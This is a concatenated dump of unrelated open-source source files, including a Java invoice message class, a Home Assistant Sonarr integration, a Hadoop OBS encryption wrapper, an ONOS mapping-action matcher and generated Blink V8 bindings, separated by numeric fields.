private String payload;
private String provider_token;
private String currency;
private LabeledPrice[] prices;
private Integer max_tip_amount;
private Integer[] suggested_tip_amount;
private String provider_data;
private String photo_url;
private Integer photo_size;
private Integer photo_width;
private Integer photo_height;
private boolean need_name;
private boolean need_phone_number;
private boolean need_email;
private boolean need_shipping_address;
private boolean send_phone_number_to_provider;
private boolean send_email_to_provider;
private boolean is_flexible;
public InputInvoiceMessageContent(String title, String description, String payload, String providerToken, String currency, LabeledPrice[] prices) {
this.title = title;
this.description = description;
this.payload = payload;
this.provider_token = providerToken;
this.currency = currency;
this.prices = prices;
}
public InputInvoiceMessageContent maxTipAmount(Integer maxTipAmount) {
this.max_tip_amount = maxTipAmount;
return this;
}
public InputInvoiceMessageContent suggestedTipAmount(Integer[] suggestedTipAmount) {
this.suggested_tip_amount = suggestedTipAmount;
return this;
}
public InputInvoiceMessageContent providerData(String providerData) {
this.provider_data = providerData;
return this;
}
public InputInvoiceMessageContent photoUrl(String photoUrl) {
this.photo_url = photoUrl;
return this;
}
public InputInvoiceMessageContent photoSize(Integer photoSize) {
this.photo_size = photoSize;
return this;
}
public InputInvoiceMessageContent photoWidth(Integer photoWidth) {
this.photo_width = photoWidth;
return this;
}
public InputInvoiceMessageContent photoHeight(Integer photoHeight) {
this.photo_height = photoHeight;
return this;
}
public InputInvoiceMessageContent needName(boolean needName) {
this.need_name = needName;
return this;
}
public InputInvoiceMessageContent needPhoneNumber(boolean needPhoneNumber) {
this.need_phone_number = needPhoneNumber;
return this;
}
public InputInvoiceMessageContent needEmail(boolean needEmail) {
this.need_email = needEmail;
return this;
}
public InputInvoiceMessageContent needShippingAddress(boolean needShippingAddress) {
this.need_shipping_address = needShippingAddress;
return this;
}
public InputInvoiceMessageContent sendPhoneNumberToProvider(boolean sendPhoneNumberToProvider) {
this.send_phone_number_to_provider = sendPhoneNumberToProvider;
return this;
}
public InputInvoiceMessageContent sendEmailToProvider(boolean sendEmailToProvider) {
this.send_email_to_provider = sendEmailToProvider;
return this;
}
public InputInvoiceMessageContent isFlexible(boolean isFlexible) {
this.is_flexible = isFlexible;
return this;
}
}
| 1,191 |
328 |
// Copyright 2021 The BladeDISC Authors. All rights reserved.
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#ifndef TENSORFLOW_COMPILER_MLIR_XLA_RAL_CONTEXT_CONTEXT_UTIL_H_
#define TENSORFLOW_COMPILER_MLIR_XLA_RAL_CONTEXT_CONTEXT_UTIL_H_
#include <algorithm>
#include "tensorflow/compiler/mlir/xla/ral/ral_helper.h"
#include "tensorflow/compiler/mlir/xla/ral/ral_logging.h"
namespace tao {
namespace ral {
template <typename T, int N>
inline void print_memref(tao::ral::MemRefType<T, N> memref,
const std::string& msg) {
auto* pmemref = &memref;
TAO_VLOG(0) << msg << " memref:"
<< "\tbasePtr: " << pmemref->basePtr
<< "\tdata: " << pmemref->data << "\toffset: " << pmemref->offset;
for (int i = 0; i < N; ++i) {
TAO_VLOG(0) << "\tsizes" << i << ": " << pmemref->sizes[i];
}
for (int i = 0; i < N; ++i) {
TAO_VLOG(0) << "\tstrides" << i << ": " << pmemref->strides[i];
}
}
template <typename T>
inline void print_memref_0d(tao::ral::MemRefType<T, 0> memref,
const std::string& msg) {
auto* pmemref = &memref;
TAO_VLOG(0) << msg << " memref:"
<< "\tbasePtr: " << pmemref->basePtr
<< "\tdata: " << pmemref->data << "\toffset: " << pmemref->offset;
}
template <typename T, int N>
tao::ral::MemRefType<T, N> assignMemRef(void* ptr,
const buffer_shape_t& shape) {
tao::ral::MemRefType<T, N> memref;
memref.basePtr = reinterpret_cast<T*>(ptr);
memref.data = reinterpret_cast<T*>(ptr);
memref.offset = 0;
for (int i = 0; i < N; ++i) {
memref.sizes[i] = shape[i];
}
memref.strides[N - 1] = 1;
for (int i = N - 1; i > 0; --i) {
memref.strides[i - 1] = memref.strides[i] * memref.sizes[i];
}
if (TAO_VLOG_IS_ON(1)) {
print_memref(memref, "assigned");
}
return memref;
}
template <typename T>
tao::ral::MemRefType<T, 0> assignMemRef_0d(void* ptr) {
tao::ral::MemRefType<T, 0> memref;
memref.basePtr = reinterpret_cast<T*>(ptr);
memref.data = reinterpret_cast<T*>(ptr);
memref.offset = 0;
if (TAO_VLOG_IS_ON(1)) {
print_memref_0d(memref, "assigned");
}
return memref;
}
template <typename T, int N>
bool isEmptyMemref(tao::ral::MemRefType<T, N> memref) {
return std::any_of(memref.sizes, memref.sizes + N,
[](int64_t dim) { return !dim; });
}
template <typename T>
bool isEmptyMemref(tao::ral::MemRefType<T, 0> memref) {
return false;
}
template <typename T, int N>
int64_t Size(tao::ral::MemRefType<T, N> memref) {
int64_t size = 1;
for (int i = 0; i < N; ++i) {
size *= memref.sizes[i];
}
return size;
}
template <typename T>
int64_t Size(tao::ral::MemRefType<T, 0> memref) {
return 1;
}
} // namespace ral
} // namespace tao
#endif // TENSORFLOW_COMPILER_MLIR_XLA_RAL_CONTEXT_CONTEXT_UTIL_H_
| 1,490 |
3,282 |
<filename>chrome/android/java/src/org/chromium/chrome/browser/preferences/LegalInformationPreferences.java
// Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package org.chromium.chrome.browser.preferences;
import android.os.Bundle;
import android.preference.PreferenceFragment;
import org.chromium.chrome.R;
/**
* Fragment to display legal information about Chrome.
*/
public class LegalInformationPreferences extends PreferenceFragment {
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
addPreferencesFromResource(R.xml.legal_information_preferences);
getActivity().setTitle(R.string.legal_information_title);
}
}
| 248 |
10,031 |
/*
* Copyright (c) 2018. paascloud.net All Rights Reserved.
* 项目名称:paascloud快速搭建企业级分布式微服务平台
* 类名称:MqMessageDto.java
* 创建人:刘兆明
* 联系方式:<EMAIL>
* 开源地址: https://github.com/paascloud
* 博客地址: http://blog.paascloud.net
* 项目官网: http://paascloud.net
*/
package com.paascloud.base.dto;
import lombok.AllArgsConstructor;
import lombok.Data;
import java.io.Serializable;
/**
* The class Tpc message dto.
*
* @author paascloud.<EMAIL>
*/
@Data
@AllArgsConstructor
public class MqMessageDto implements Serializable {
private static final long serialVersionUID = -995670498005087805L;
/**
* 消息key
*/
private String messageKey;
/**
* topic
*/
private String messageTopic;
}
| 347 |
30,023 |
<reponame>MrDelik/core
"""The Sonarr component."""
from __future__ import annotations
from datetime import timedelta
import logging
from aiopyarr import ArrAuthenticationException, ArrException
from aiopyarr.models.host_configuration import PyArrHostConfiguration
from aiopyarr.sonarr_client import SonarrClient
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
CONF_API_KEY,
CONF_HOST,
CONF_PORT,
CONF_SSL,
CONF_URL,
CONF_VERIFY_SSL,
Platform,
)
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import ConfigEntryAuthFailed, ConfigEntryNotReady
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from .const import (
CONF_BASE_PATH,
CONF_UPCOMING_DAYS,
CONF_WANTED_MAX_ITEMS,
DATA_HOST_CONFIG,
DATA_SONARR,
DATA_SYSTEM_STATUS,
DEFAULT_UPCOMING_DAYS,
DEFAULT_WANTED_MAX_ITEMS,
DOMAIN,
)
PLATFORMS = [Platform.SENSOR]
SCAN_INTERVAL = timedelta(seconds=30)
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up Sonarr from a config entry."""
if not entry.options:
options = {
CONF_UPCOMING_DAYS: entry.data.get(
CONF_UPCOMING_DAYS, DEFAULT_UPCOMING_DAYS
),
CONF_WANTED_MAX_ITEMS: entry.data.get(
CONF_WANTED_MAX_ITEMS, DEFAULT_WANTED_MAX_ITEMS
),
}
hass.config_entries.async_update_entry(entry, options=options)
host_configuration = PyArrHostConfiguration(
api_token=entry.data[CONF_API_KEY],
url=entry.data[CONF_URL],
verify_ssl=entry.data[CONF_VERIFY_SSL],
)
sonarr = SonarrClient(
host_configuration=host_configuration,
session=async_get_clientsession(hass),
)
try:
system_status = await sonarr.async_get_system_status()
except ArrAuthenticationException as err:
raise ConfigEntryAuthFailed(
"API Key is no longer valid. Please reauthenticate"
) from err
except ArrException as err:
raise ConfigEntryNotReady from err
entry.async_on_unload(entry.add_update_listener(_async_update_listener))
hass.data.setdefault(DOMAIN, {})
hass.data[DOMAIN][entry.entry_id] = {
DATA_HOST_CONFIG: host_configuration,
DATA_SONARR: sonarr,
DATA_SYSTEM_STATUS: system_status,
}
hass.config_entries.async_setup_platforms(entry, PLATFORMS)
return True
async def async_migrate_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Migrate old entry."""
_LOGGER.debug("Migrating from version %s", entry.version)
if entry.version == 1:
new_proto = "https" if entry.data[CONF_SSL] else "http"
new_host_port = f"{entry.data[CONF_HOST]}:{entry.data[CONF_PORT]}"
new_path = ""
if entry.data[CONF_BASE_PATH].rstrip("/") not in ("", "/", "/api"):
new_path = entry.data[CONF_BASE_PATH].rstrip("/")
data = {
**entry.data,
CONF_URL: f"{new_proto}://{new_host_port}{new_path}",
}
hass.config_entries.async_update_entry(entry, data=data)
entry.version = 2
_LOGGER.info("Migration to version %s successful", entry.version)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
unload_ok = await hass.config_entries.async_unload_platforms(entry, PLATFORMS)
if unload_ok:
hass.data[DOMAIN].pop(entry.entry_id)
return unload_ok
async def _async_update_listener(hass: HomeAssistant, entry: ConfigEntry) -> None:
"""Handle options update."""
await hass.config_entries.async_reload(entry.entry_id)
| 1,627 |
349 |
<reponame>bvn13/skin-composer
package com.ray3k.skincomposer.dialog.scenecomposer.undoables;
import com.ray3k.skincomposer.dialog.scenecomposer.DialogSceneComposer;
import com.ray3k.skincomposer.dialog.scenecomposer.DialogSceneComposerModel;
public class ScrollPaneForceScrollYUndoable implements SceneComposerUndoable {
private DialogSceneComposerModel.SimScrollPane scrollPane;
private DialogSceneComposer dialog;
private boolean forceScrollY;
private boolean previousForceScrollY;
public ScrollPaneForceScrollYUndoable(boolean forceScrollY) {
this.forceScrollY = forceScrollY;
dialog = DialogSceneComposer.dialog;
scrollPane = (DialogSceneComposerModel.SimScrollPane) dialog.simActor;
previousForceScrollY = scrollPane.forceScrollY;
}
@Override
public void undo() {
scrollPane.forceScrollY = previousForceScrollY;
if (dialog.simActor != scrollPane) {
dialog.simActor = scrollPane;
dialog.populateProperties();
dialog.populatePath();
}
dialog.model.updatePreview();
}
@Override
public void redo() {
scrollPane.forceScrollY = forceScrollY;
if (dialog.simActor != scrollPane) {
dialog.simActor = scrollPane;
dialog.populateProperties();
dialog.populatePath();
}
dialog.model.updatePreview();
}
@Override
public String getRedoString() {
return "Redo \"ScrollPane force scroll Y " + forceScrollY + "\"";
}
@Override
public String getUndoString() {
return "Undo \"ScrollPane force scroll Y " + forceScrollY + "\"";
}
}
| 730 |
523 |
{"type":"newline","line":2}
{"type":"mixin","line":2,"val":"article","args":"name"}
{"type":"indent","line":3,"val":2}
{"type":"tag","line":3,"val":"section","selfClosing":false}
{"type":"class","line":3,"val":"article"}
{"type":"indent","line":4,"val":4}
{"type":"tag","line":4,"val":"h1","selfClosing":false}
{"type":"code","line":4,"val":"name","escape":true,"buffer":true}
{"type":"newline","line":5}
{"type":"mixin-block","line":5}
{"type":"outdent","line":7}
{"type":"outdent","line":7}
{"type":"tag","line":7,"val":"html","selfClosing":false}
{"type":"indent","line":8,"val":2}
{"type":"tag","line":8,"val":"body","selfClosing":false}
{"type":"indent","line":9,"val":4}
{"type":"call","line":9,"val":"article","args":"'Foo'"}
{"type":":","line":9}
{"type":"tag","line":9,"val":"p","selfClosing":false}
{"type":"text","line":9,"val":"I'm article foo"}
{"type":"outdent","line":11}
{"type":"outdent","line":11}
{"type":"mixin","line":11,"val":"article","args":"name"}
{"type":"indent","line":12,"val":2}
{"type":"tag","line":12,"val":"section","selfClosing":false}
{"type":"class","line":12,"val":"article"}
{"type":"indent","line":13,"val":4}
{"type":"tag","line":13,"val":"h1","selfClosing":false}
{"type":"code","line":13,"val":"name","escape":true,"buffer":true}
{"type":"newline","line":14}
{"type":"tag","line":14,"val":"p","selfClosing":false}
{"type":"indent","line":15,"val":6}
{"type":"mixin-block","line":15}
{"type":"outdent","line":17}
{"type":"outdent","line":17}
{"type":"outdent","line":17}
{"type":"tag","line":17,"val":"html","selfClosing":false}
{"type":"indent","line":18,"val":2}
{"type":"tag","line":18,"val":"body","selfClosing":false}
{"type":"indent","line":19,"val":4}
{"type":"call","line":19,"val":"article","args":"'Something'"}
{"type":"dot","line":19}
{"type":"start-pipeless-text","line":19}
{"type":"text","line":20,"val":"I'm a much longer"}
{"type":"newline","line":21}
{"type":"text","line":21,"val":"text-only article,"}
{"type":"newline","line":22}
{"type":"text","line":22,"val":"but you can still"}
{"type":"newline","line":23}
{"type":"text","line":23,"val":"inline html tags"}
{"type":"newline","line":24}
{"type":"text","line":24,"val":"in me if you want."}
{"type":"end-pipeless-text","line":24}
{"type":"outdent","line":24}
{"type":"outdent","line":24}
{"type":"eos","line":24}
| 866 |
842 |
<filename>payload-dependencies/src/main/java/io/jenkins/jenkinsfile/runner/payloadDeps/PayloadDependencies.java
package io.jenkins.jenkinsfile.runner.payloadDeps;
import org.kohsuke.accmod.Restricted;
import org.kohsuke.accmod.restrictions.NoExternalUse;
@Restricted(NoExternalUse.class)
public class PayloadDependencies {
// Placeholder class
}
| 125 |
1,338 |
/*
* BeOS Driver for Intel ICH AC'97 Link interface
*
* Copyright (c) 2002, <NAME> <<EMAIL>>
*
* All rights reserved.
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
*
* - Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* - Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*/
#ifndef _CONFIG_H_
#define _CONFIG_H_
#include "ac97.h"
typedef struct
{
const char *name;
uint32 nambar;
uint32 nabmbar;
uint32 irq;
uint32 type;
uint32 mmbar; // ich4
uint32 mbbar; // ich4
void * log_mmbar; // ich4
void * log_mbbar; // ich4
area_id area_mmbar; // ich4
area_id area_mbbar; // ich4
uint32 codecoffset;
ac97_dev *ac97;
uint32 input_rate;
uint32 output_rate;
} device_config;
extern device_config *config;
status_t probe_device(void);
#define TYPE_DEFAULT 0x00
#define TYPE_ICH4 0x01
#define TYPE_SIS7012 0x02
/* The SIS7012 chipset has SR and PICB registers swapped when compared to Intel */
#define GET_REG_X_PICB(cfg) (((cfg)->type == TYPE_SIS7012) ? _ICH_REG_X_SR : _ICH_REG_X_PICB)
#define GET_REG_X_SR(cfg) (((cfg)->type == TYPE_SIS7012) ? _ICH_REG_X_PICB : _ICH_REG_X_SR)
/* Each 16 bit sample is counted as 1 in SIS7012 chipsets, 2 in all others */
#define GET_HW_SAMPLE_SIZE(cfg) (((cfg)->type == TYPE_SIS7012) ? 1 : 2)
#endif
| 868 |
545 |
<gh_stars>100-1000
#include <vector>
#include <iostream>
#include <sstream>
std::vector<int>::const_iterator
hasValue(std::vector<int>::const_iterator begin,
std::vector<int>::const_iterator end,
int k) {
for (auto it = begin; it != end; ++it)
if (k == *it)
return it;
return end;
}
int main() {
std::string str;
std::getline(std::cin, str);
std::istringstream iss(str);
std::vector<int> vi;
int k;
while (iss >> k)
vi.push_back(k);
std::cin >> k;
auto it = hasValue(vi.cbegin(), vi.cend(), k);
if (it == vi.end())
std::cout << "No found " << k << " in range" << std::endl;
else
std::cout << "Found " << *it
<< " at position " << it - vi.cbegin() << std::endl;
return 0;
}
| 338 |
14,425 |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.fs.obs;
import static org.apache.hadoop.fs.obs.OBSConstants.SSE_KEY;
import static org.apache.hadoop.fs.obs.OBSConstants.SSE_TYPE;
import com.obs.services.model.SseCHeader;
import com.obs.services.model.SseKmsHeader;
import org.apache.hadoop.conf.Configuration;
/**
* Wrapper for Server-Side Encryption (SSE).
*/
class SseWrapper {
/**
* SSE-KMS: Server-Side Encryption with Key Management Service.
*/
private static final String SSE_KMS = "sse-kms";
/**
* SSE-C: Server-Side Encryption with Customer-Provided Encryption Keys.
*/
private static final String SSE_C = "sse-c";
/**
* SSE-C header.
*/
private SseCHeader sseCHeader;
/**
* SSE-KMS header.
*/
private SseKmsHeader sseKmsHeader;
@SuppressWarnings("deprecation")
SseWrapper(final Configuration conf) {
String sseType = conf.getTrimmed(SSE_TYPE);
if (null != sseType) {
String sseKey = conf.getTrimmed(SSE_KEY);
if (sseType.equalsIgnoreCase(SSE_C) && null != sseKey) {
sseCHeader = new SseCHeader();
sseCHeader.setSseCKeyBase64(sseKey);
sseCHeader.setAlgorithm(
com.obs.services.model.ServerAlgorithm.AES256);
} else if (sseType.equalsIgnoreCase(SSE_KMS)) {
sseKmsHeader = new SseKmsHeader();
sseKmsHeader.setEncryption(
com.obs.services.model.ServerEncryption.OBS_KMS);
sseKmsHeader.setKmsKeyId(sseKey);
}
}
}
boolean isSseCEnable() {
return sseCHeader != null;
}
boolean isSseKmsEnable() {
return sseKmsHeader != null;
}
SseCHeader getSseCHeader() {
return sseCHeader;
}
SseKmsHeader getSseKmsHeader() {
return sseKmsHeader;
}
}
| 945 |
421 |
#using <System.Xml.dll>
using namespace System;
using namespace System::IO;
using namespace System::Xml;
using namespace System::Xml::Schema;
using namespace System::Xml::Serialization;
// <Snippet1>
public ref class Vehicle
{
public:
[XmlAttributeAttribute(Form=XmlSchemaForm::Qualified)]
String^ Maker;
[XmlAttributeAttribute(Form=XmlSchemaForm::Unqualified)]
String^ ModelID;
};
// </Snippet1>
| 166 |
1,091 |
/*
* Copyright 2017-present Open Networking Foundation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.onosproject.mapping.codec;
import com.fasterxml.jackson.databind.JsonNode;
import org.hamcrest.Description;
import org.hamcrest.TypeSafeDiagnosingMatcher;
import org.onosproject.mapping.actions.MappingAction;
import org.onosproject.mapping.actions.NoMappingAction;
import org.onosproject.mapping.actions.DropMappingAction;
import org.onosproject.mapping.actions.ForwardMappingAction;
import org.onosproject.mapping.actions.NativeForwardMappingAction;
/**
* Hamcrest matcher for mapping actions.
*/
public final class MappingActionJsonMatcher
extends TypeSafeDiagnosingMatcher<JsonNode> {
private final MappingAction action;
/**
* A default constructor.
*
* @param action mapping action
*/
private MappingActionJsonMatcher(MappingAction action) {
this.action = action;
}
/**
* Matches the contents of a no mapping action.
*
* @param node JSON action to match
* @param description object used for recording errors
* @return true if contents match, false otherwise
*/
private boolean matchNoAction(JsonNode node, Description description) {
NoMappingAction actionToMatch = (NoMappingAction) action;
final String jsonType = node.get(MappingActionCodec.TYPE).textValue();
if (!actionToMatch.type().name().equals(jsonType)) {
description.appendText("type was " + jsonType);
return false;
}
return true;
}
/**
* Matches the contents of a drop mapping action.
*
* @param node JSON action to match
* @param description object used for recording errors
* @return true if the contents match, false otherwise
*/
private boolean matchDropAction(JsonNode node, Description description) {
DropMappingAction actionToMatch = (DropMappingAction) action;
final String jsonType = node.get(MappingActionCodec.TYPE).textValue();
if (!actionToMatch.type().name().equals(jsonType)) {
description.appendText("type was " + jsonType);
return false;
}
return true;
}
/**
* Matches the contents of a forward mapping action.
*
* @param node JSON action to match
* @param description object used for recording errors
* @return true if the contents match, false otherwise
*/
private boolean matchForwardAction(JsonNode node, Description description) {
ForwardMappingAction actionToMatch = (ForwardMappingAction) action;
final String jsonType = node.get(MappingActionCodec.TYPE).textValue();
if (!actionToMatch.type().name().equals(jsonType)) {
description.appendText("type was " + jsonType);
return false;
}
return true;
}
/**
* Matches the contents of a native forward mapping action.
*
* @param node JSON action to match
* @param description object used for recording errors
* @return true if the contents match, false otherwise
*/
private boolean matchNativeForwardAction(JsonNode node, Description description) {
NativeForwardMappingAction actionToMatch = (NativeForwardMappingAction) action;
final String jsonType = node.get(MappingActionCodec.TYPE).textValue();
if (!actionToMatch.type().name().equals(jsonType)) {
description.appendText("type was " + jsonType);
return false;
}
return true;
}
@Override
protected boolean matchesSafely(JsonNode jsonNode, Description description) {
// check type
final JsonNode jsonTypeNode = jsonNode.get(MappingActionCodec.TYPE);
final String jsonType = jsonTypeNode.textValue();
final String type = action.type().name();
if (!jsonType.equals(type)) {
description.appendText("type was " + type);
return false;
}
if (action instanceof NoMappingAction) {
return matchNoAction(jsonNode, description);
} else if (action instanceof DropMappingAction) {
return matchDropAction(jsonNode, description);
} else if (action instanceof ForwardMappingAction) {
return matchForwardAction(jsonNode, description);
} else if (action instanceof NativeForwardMappingAction) {
return matchNativeForwardAction(jsonNode, description);
}
return false;
}
@Override
public void describeTo(Description description) {
description.appendText(action.toString());
}
/**
* Factory to allocate a mapping action matcher.
*
* @param action action object we are looking for
* @return matcher
*/
public static MappingActionJsonMatcher matchesAction(MappingAction action) {
return new MappingActionJsonMatcher(action);
}
}
| 1,931 |
1,652 |
package com.ctrip.xpipe.redis.core.proxy.exception;
import com.ctrip.xpipe.exception.XpipeRuntimeException;
public class ProxyProtocolParseException extends XpipeRuntimeException {
public ProxyProtocolParseException(String message) {
super(message);
}
}
| 90 |
575 |
<filename>third_party/blink/renderer/bindings/tests/results/core/v8_test_interface_constructor_4.cc
// Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// This file has been auto-generated from the Jinja2 template
// third_party/blink/renderer/bindings/templates/interface.cc.tmpl
// by the script code_generator_v8.py.
// DO NOT MODIFY!
// clang-format off
#include "third_party/blink/renderer/bindings/tests/results/core/v8_test_interface_constructor_4.h"
#include <algorithm>
#include "base/memory/scoped_refptr.h"
#include "third_party/blink/renderer/bindings/core/v8/idl_types.h"
#include "third_party/blink/renderer/bindings/core/v8/native_value_traits_impl.h"
#include "third_party/blink/renderer/bindings/core/v8/v8_dom_configuration.h"
#include "third_party/blink/renderer/bindings/core/v8/v8_test_interface_constructor_4.h"
#include "third_party/blink/renderer/core/execution_context/execution_context.h"
#include "third_party/blink/renderer/core/frame/local_dom_window.h"
#include "third_party/blink/renderer/core/frame/web_feature.h"
#include "third_party/blink/renderer/platform/bindings/exception_messages.h"
#include "third_party/blink/renderer/platform/bindings/exception_state.h"
#include "third_party/blink/renderer/platform/bindings/v8_object_constructor.h"
#include "third_party/blink/renderer/platform/instrumentation/use_counter.h"
#include "third_party/blink/renderer/platform/scheduler/public/cooperative_scheduling_manager.h"
#include "third_party/blink/renderer/platform/wtf/get_ptr.h"
namespace blink {
// Suppress warning: global constructors, because struct WrapperTypeInfo is trivial
// and does not depend on another global objects.
#if defined(COMPONENT_BUILD) && defined(WIN32) && defined(__clang__)
#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Wglobal-constructors"
#endif
const WrapperTypeInfo v8_test_interface_constructor_4_wrapper_type_info = {
gin::kEmbedderBlink,
V8TestInterfaceConstructor4::DomTemplate,
nullptr,
"TestInterfaceConstructor4",
nullptr,
WrapperTypeInfo::kWrapperTypeObjectPrototype,
WrapperTypeInfo::kObjectClassId,
WrapperTypeInfo::kNotInheritFromActiveScriptWrappable,
};
#if defined(COMPONENT_BUILD) && defined(WIN32) && defined(__clang__)
#pragma clang diagnostic pop
#endif
// This static member must be declared by DEFINE_WRAPPERTYPEINFO in TestInterfaceConstructor4.h.
// For details, see the comment of DEFINE_WRAPPERTYPEINFO in
// platform/bindings/ScriptWrappable.h.
const WrapperTypeInfo& TestInterfaceConstructor4::wrapper_type_info_ = v8_test_interface_constructor_4_wrapper_type_info;
// not [ActiveScriptWrappable]
static_assert(
!std::is_base_of<ActiveScriptWrappableBase, TestInterfaceConstructor4>::value,
"TestInterfaceConstructor4 inherits from ActiveScriptWrappable<>, but is not specifying "
"[ActiveScriptWrappable] extended attribute in the IDL file. "
"Be consistent.");
static_assert(
std::is_same<decltype(&TestInterfaceConstructor4::HasPendingActivity),
decltype(&ScriptWrappable::HasPendingActivity)>::value,
"TestInterfaceConstructor4 is overriding hasPendingActivity(), but is not specifying "
"[ActiveScriptWrappable] extended attribute in the IDL file. "
"Be consistent.");
namespace test_interface_constructor_4_v8_internal {
static void Constructor1(const v8::FunctionCallbackInfo<v8::Value>& info) {
RUNTIME_CALL_TIMER_SCOPE_DISABLED_BY_DEFAULT(info.GetIsolate(), "Blink_TestInterfaceConstructor4_ConstructorCallback");
ExceptionState exception_state(info.GetIsolate(), ExceptionState::kConstructionContext, "TestInterfaceConstructor4");
ScriptState* script_state = ScriptState::From(
info.NewTarget().As<v8::Object>()->CreationContext());
TestInterfaceConstructor4* test_interface_4_arg;
test_interface_4_arg = V8TestInterfaceConstructor4::ToImplWithTypeCheck(info.GetIsolate(), info[0]);
if (!test_interface_4_arg) {
exception_state.ThrowTypeError(ExceptionMessages::ArgumentNotOfType(0, "TestInterfaceConstructor4"));
return;
}
TestInterfaceConstructor4* impl = TestInterfaceConstructor4::Create(script_state, test_interface_4_arg, exception_state);
if (exception_state.HadException()) {
return;
}
v8::Local<v8::Object> wrapper = info.Holder();
wrapper = impl->AssociateWithWrapper(info.GetIsolate(), V8TestInterfaceConstructor4::GetWrapperTypeInfo(), wrapper);
V8SetReturnValue(info, wrapper);
}
static void Constructor2(const v8::FunctionCallbackInfo<v8::Value>& info) {
RUNTIME_CALL_TIMER_SCOPE_DISABLED_BY_DEFAULT(info.GetIsolate(), "Blink_TestInterfaceConstructor4_ConstructorCallback");
ExceptionState exception_state(info.GetIsolate(), ExceptionState::kConstructionContext, "TestInterfaceConstructor4");
ScriptState* script_state = ScriptState::From(
info.NewTarget().As<v8::Object>()->CreationContext());
V8StringResource<> usv_string_arg;
usv_string_arg = NativeValueTraits<IDLUSVString>::NativeValue(info.GetIsolate(), info[0], exception_state);
if (exception_state.HadException())
return;
TestInterfaceConstructor4* impl = TestInterfaceConstructor4::Create(script_state, usv_string_arg, exception_state);
if (exception_state.HadException()) {
return;
}
v8::Local<v8::Object> wrapper = info.Holder();
wrapper = impl->AssociateWithWrapper(info.GetIsolate(), V8TestInterfaceConstructor4::GetWrapperTypeInfo(), wrapper);
V8SetReturnValue(info, wrapper);
}
static void Constructor(const v8::FunctionCallbackInfo<v8::Value>& info) {
ExceptionState exception_state(info.GetIsolate(), ExceptionState::kConstructionContext, "TestInterfaceConstructor4");
switch (std::min(1, info.Length())) {
case 1:
if (V8TestInterfaceConstructor4::HasInstance(info[0], info.GetIsolate())) {
test_interface_constructor_4_v8_internal::Constructor1(info);
return;
}
if (true) {
test_interface_constructor_4_v8_internal::Constructor2(info);
return;
}
break;
default:
exception_state.ThrowTypeError(ExceptionMessages::NotEnoughArguments(1, info.Length()));
return;
}
exception_state.ThrowTypeError("No matching constructor signature.");
}
CORE_EXPORT void ConstructorCallback(const v8::FunctionCallbackInfo<v8::Value>& info) {
RUNTIME_CALL_TIMER_SCOPE_DISABLED_BY_DEFAULT(info.GetIsolate(), "Blink_TestInterfaceConstructor4_Constructor");
ExecutionContext* execution_context_for_measurement = CurrentExecutionContext(info.GetIsolate());
UseCounter::Count(execution_context_for_measurement, WebFeature::kV8TestInterfaceConstructor4_Constructor);
if (!info.IsConstructCall()) {
V8ThrowException::ThrowTypeError(
info.GetIsolate(),
ExceptionMessages::ConstructorNotCallableAsFunction("TestInterfaceConstructor4"));
return;
}
if (ConstructorMode::Current(info.GetIsolate()) == ConstructorMode::kWrapExistingObject) {
